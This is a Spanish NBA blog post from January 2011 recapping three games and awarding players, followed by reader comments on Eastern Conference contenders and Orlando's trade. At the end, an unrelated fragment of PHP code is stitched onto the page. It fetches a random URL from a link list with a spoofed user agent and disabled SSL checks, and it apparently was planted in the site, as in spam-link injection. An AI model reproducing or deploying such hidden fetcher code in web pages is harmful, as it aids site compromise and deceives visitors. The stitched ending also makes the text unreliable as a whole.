La Crónica (10/01/2011)

11 de January de 2011 por txusma

Sólo tres partidos.

Los Celtics se llevaron la 2ª derrota consecutiva a manos de los Rockets. Partidazo de Aaron Brooks como a él le gusta, libre de tirarse hasta las zapatillas jugando de tirador en lugar de distribuidor, “gracias” a la lesión de Kevin Martin. Ya era raro que no había tenido ni un problema físico durante el curso. De la mano de los triples de Brooks y de los rebotes de Jordan Hill y Scola los Rockets desarmaron a los Celtics, muy a pesar del inmenso partido de Marquis Daniels.

En el United Center, Rose y Boozer se merendaron a los Pistons, a los cuales sólo les faltaba marearse con la posibilidad del megatraspaso. Los mejores de los visitantes fueron, desde el banco, Daye, Wilcox y Greg Monroe.

Finalmente los Charlotte Bobcats confirmaron su mejoría logrando su 3ª victoria consecutiva a costa de los Grizzlies. Extraordinaria actuación de Stephen Jackson como también de Augustin. Zach Randolph celebró su nombramiento como jugador de la semana en el Oeste con un 15-15… pero con un 7 de 17 en tiro, tan ineficaz como todo su equipo que no llegó al 40%.

PREMIOS

MVP: Vaya parejita la que han montado en Chicago. Derrick Rose se fue a los 29 puntos, 7 asistencias y 5 rebotes y Carlos Boozer a los 27 puntos y 11 rebotes. Gracias a ellos los Bulls tienen derecho a soñar.

Rookie: Patrick Patterson aprovecha los pocos minutos de los que disfruta en Houston. Anoche, ante la ausencia de Brad Miller, jugó 17 minutos aportando 13 puntos y 3 rebotes. A mi me da muy buenas sensaciones.

Sorpresa: Anoche le entró casi todo a Marquis Daniels. 7 de 8 en tiros de campo para 19 puntos y además, 7 rebotes. Ahora mismo su aportación y la de todos es esencial para los Celtics.

Decepción: ¿Se nos está perdiendo OJ Mayo? 1 de 8 para el de los Grizzlies y no es, ni mucho menos, la primera vez esta temporada.

Esfuerzo en vano: Los 19 puntos de Marquis Daniels y Ray Allen no sirvieron para evitar la derrota en casa frente los Rockets.

Comenta

8 comentarios a esta entrada

  1. gabrielj dice:
    #1

    esta derrota de los Celtics deja a Miami como líder del este ¿ creéis que mantendrán el puesto hasta final de temporada? yo veo difícil que se lo quiten

      Citar

  2. GreenPride dice:
    #2

    Segunda derrota consecutiva de los verdes. Como intuia este mes se les va a hacer bastante cuesta arriba al estar muy cargado de partidos e ir con la lengua un poco fuera por veterania y por las lesiones. Rivers mantuvo mucho a los suplentes porque sabe que no puede machacar al equipo y porque estos tampoco estaban acertados la verdad. Los Celtics necesitan de vuelta a Garnett cuanto antes para dejar de ser un coladero en el rebote, principal causa de las 2 derrotas. Creo que los Heat tendran casi seguro ventaja campo sobre Boston y ya veremos si tambien Orlando o Chicago. Por mis colores, ojala me equivoque.

      Citar

  3. Sancho88 dice:
    #3

    Hombre, realmente eran los favoritos a acabar primeros en temporada regular y yo tampoco creo que ahora que por fin han consiguido el primer puesto, alguien pueda quitárselo. Los Celtics han sido los mejores hasta navidad, pero lógicamente deben dosificar a sus jugadores, mucho más veteranos que los de Miami, que tras los primeros meses de acoplamiento ahora por fin demuestran su candidatura al título, con la mejor defensa del campeonato. Si no se lesiona ninguno de los jugones yo pienso que mantendrán sin dificultades ese puesto.
    Además, Boston mete bajones con frecuencia, y a partir de febrero aún más. El año pasado, creo recordar que quedaron cuartos finalmente, despues de haber estado por detrás de Orlando toda la temporada. Para mí, su rival por un puesto alto en playoffs no debe ser Miami, sino Orlando, ahora que comienzan a funcionar Nelson – J. Richardson – Turkoglu – Howard (bye bye los 20 millonacos de Lewis, bye bye a la irregularidad y el ego de Carter, punto positivo a Denise y el resto de seguidores de Magic de esta página por confiar en el megatraspaso); y cuidadito también con Chicaco, que con la pareja Rose – Boozer al 100%, más “secundarios” de la talla de Deng y Noah (cuando se recupere de su lesión) puede ser una amenaza por ese segundo puesto en el Este.
    Así que, recapitulando, pronostico un bajón de Celtics, a Miami con su apisonadora particular, y Orlando y Chicago amenazando la soñada final de conferencia entre los “orgullosos” y los de “South Beach”.
    Si hubiera unos playoffs con los 4 mejores equipos de cada conferencia… ganaría mucho más interés la NBA. Esos cuatro por el Este, más San Antonio, Dallas, Lakers, y Oklahoma o Utah por el Oeste, cruzándose el cuarto del Oeste contra el primero del Este, y así.
    Ojalá no tardemos muchos años en ver un sistema de eliminatorias más entretenido. Las primeras rondas son un tostón. Encima a 7 partidos… con algún equipo en el Este metiéndose con menos de 40 victorias…espeluznante, a veces.

      Citar

  4. kantonyo dice:
    #4

    Sancho88, los que podamos ver con peores ojos el traspaso de Orlando, no consideramos que no sean capaces de hacer lo que han hecho hasta ahora. Lo que yo, en mi opinión, creo, es que con estas adquisiciones son un pelin menos favoritos para poder ganar a Miami, Celtics, Lakers o Spurs. Jugadores como Carter o Lewis pecan de poco caracter y regularidad pero en una eliminatoria los considero mucho más peligrosos que Jason, Arenas y Turkoglu. Por cierto estos tres nuevos jugadores si de algo no destacan es en regularidad y en solidaridad…

    Criticar a Carter por su ego e irregularidad y pensar que con Arenas, Jason y Turkoglu eso está solucionado, creo que es un gran error. Mientras todo vaya bonito de lujo, cuando algo empiece a salir mal ya me gustará verlos…

    Pero aún así también creo que son uno de los mejores equipos del este y máximos favoritos a todo, antes y después del traspaso.

    Txusma, coincido contigo en las buenas maneras que apunta Patterson, parece un veterano y sólo tiene 21 añitos. Se nota que ha estado tres años a buen nivel en Kentucky antes de dar el salto a la NBA.

      Citar

  5. nacho dice:
    #5

    Hombre, Kantoyo, y las asistencias del turco a volver a Orlando? Irregular es, pero menos que Carter, y con bastante menos ego en el juego. El cabr… está feliz en Miami y se le nota. ¿Ponerlo a bajar de un burro por lo que ha hecho en Toronto y en Phoenix?, de acuerdo, pero que es el tío que necesitaban en Orlando (por lo menos mientras esté Van Gundy) creo que está fuera de toda duda. Y el resto de momento mejora, y con mucho, a Lewis.
    Creo que estos Orlando, con tiempo de acoplarse, pueden llegar a mucho, y si Van Gundy acierta (ojo que aunque lo pongamos a parir no es malo) en PO, yo los veo en las finales.
    Aunque la cagaré, porque a principio daba a LA fijos en las finales y ahora ni de coña. Y por preferir me quedo con verdes contra amarillos.
    por cierto estos últimos días DeRozan va en línea de MIP, lástima que sea tan tarde, o pega otro estirón (difícil) o pierdo otro punto de la porra y ya van…

      Citar

  6. Sancho88 dice:
    #6

    Sí, a mis pobre Kings les cascó 29 puntos a mates y movidas de las suyas. Si jugara todos los días contra este tipo de equipos podría conseguir el MIP

      Citar

  7. Denise dice:
    #7

    Hombre Sancho, eres de los Kings? Te doy el pesame por esta temporada…
    DeRozan podría llegar a ser un grandisimo escudero en un equipo ganador si mejorase su tiro exterior. Da pena verlo tirando de fuera.
    Los Magic son capaces de lo mejor…y de lo peor, porque a pesar de la buena marcha actual, cuenta con juagdores irregulares. Arenas lo mismo te gana el partido él solito, que desconecta y juega a su bola, Turkoglu lo mismo te hace un triple doble y al siguiente partido desaparece, y Jason Richardson es un jugador cuya anotación depende mucho de su acierto exterior, cuando no está enchifado desde fuera es un jugador normalito.
    Eso sí, deportivamente, de momento Orlando ha salido favorecido del trade. No porque los que hayan llegado sean mejores que los que sean ido, sino porque los que han llegado, de momento han mostrado buena actitud y ganas, vease claramente en Turkoglu, el hijo pródigo que se fue en busca de dolares, y volvió con el bolsillo lleno y las manos con callos de tanto tocarse los huev en Phoenix y Toronto, y de repente se transformó.
    Sorpresa para mí, la de Clark, practicamente ni le conocía, y el tío juega poco pero ofrece minutos muy dignos, me gustaría hasta que jugase más.
    De los que se han ido, Lewis era un crack, pero su actitud no era la de un profesional, Pietrus era bueno pero estaría mosca de ver como no le daban bola y hasta la basura de Quentin Richardson estaba delante de él en la rotación, Gortat también estaría cabreado y aburrido de jugar tan poco, y Carter simplemente está de vuelta..

      Citar

  8. Sancho88 dice:
    #8

    Lo de Gortat es muy entendible en el plano deportivo. Un paisano super completo, explosivo y físicamente muy preparado, que le daba grandes sustituciones a Howard pero seguramente quisiera más protagonismo. En lo económico, es un poco traición al equipo que le dio su primer contrato serio (no solo en la NBA, sino en el baloncesto profesional), además, si no me equivoco la pasada temporada le renovaron con bastante pasta de por medio. De todas formas, ahora tiene la oportunidad de demostrar lo que vale en Phoenix. Denise, lo que has explicado con respecto al cambio de actitud es a lo que yo me refería y por lo que Orlando ha demostrado que sale ganando con el trade. La llegada de Turkoglu es muy importante porque en Orlando es mucho más que un buen alero, anotador, pasador, inteligente… es el líder psicológico en la cancha. Es imposible olvidar los playoffs que se marcó hace dos temporadas. Es evidente que muchos días se borra, pero siempre ha sido un poco irregular, hasta en sus buenos tiempos en los Kings, jeje. Con Stojakovic titular y él de suplente, menudo nivelazo que había ahí.

    A eso le sumas una de las manitas más privilegiadas de la NBA, J.Rich., que también es irregular, obviamente, pero creo que era mucho más desesperante ver las pedazo series que se marcaba el señor Vicente… algunas noches 1-8, otras 2-10… se jugaba hasta las zapatillas el muchacho.

    Lo de Lewis, no creo que sea por tema deportivo, ya que en buena forma es un jugador comparable a Lamar Odom, que puede jugar casi de cualquier cosa y ser super decisivo en los grandes momentos, pero claro, un pavo que cobra 20 kilos… pues tienes a Bass, que al chaval se le ve que va progresando y te vale. Así, si te sale mal la operación, el año que viene tienes 20 kilos frescos para pescar en un buen traspaso e ir descaradamente a por el anillo.

    Y Arenas también es una metralleta, puede hacer perfectamente 40 puntos o salir dormido, hacer 3 faltas en 5 minutos y no querer saber nada del asunto. Supongo que el día que tenga malo Richardson, Van Gundy tirará de él.

    Yo me equivoqué pensando que esto fracasaría, y, aunque es pronto para hablar, veo a Orlando peleando en las finales del Este por lo menos. Tiene buena pinta, francamente. Ya se vengaron el otro día de los Mavs, y parece que en dos semanas han podido armar el equipo dignamente. Hay ganas de verles, sobre todo porque son de esos equipos de segunda fila (hablando de las posibilidades reales por pelear el título a Lakers y Boston, que al final siempre están), que junto a Miami, Spurs, Dallas y Bulls nos van a hacer las eliminatorias un poco más divertidas.

    Y, para acabar… pues los Kings no levantan cabeza desde el traspaso de Stojakovic a Indiana, de Bibby a Atlanta, Kevin Martin a Houston por el paquete de Nocioni… Y, sobre todo, desde que se fue Adelman a los Rockets. Todos aquellos cambios salieron como el culo, porque intentaron renovar de arriba a abajo todo el vestuario y la cagaron. Si esque hasta dejaron marchar a Gerald Wallace en sus comienzos. Todo un despropósito de estrategia deportiva.

    Aunque bueno, pese a las 8 putas victorias que llevan y 27 o 28 derrotas, aún se les quiere, jeje. Yo pienso que les hace falta un tío royo Calderón, para dirigir un pelín los ataques, que casi siempre se basan en que Landry se busque las habas, o los minutos on fire de Casspi y en cosas así. Creo que hay que tener un poco de paciencia con Cousins y Evans, que juntos pueden ser una pareja de futuro, y lo que más necesitan es un entrenador que les enseñe a defender. Casi siempre les caen de 110 puntos para arriba, y así no puede ser

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>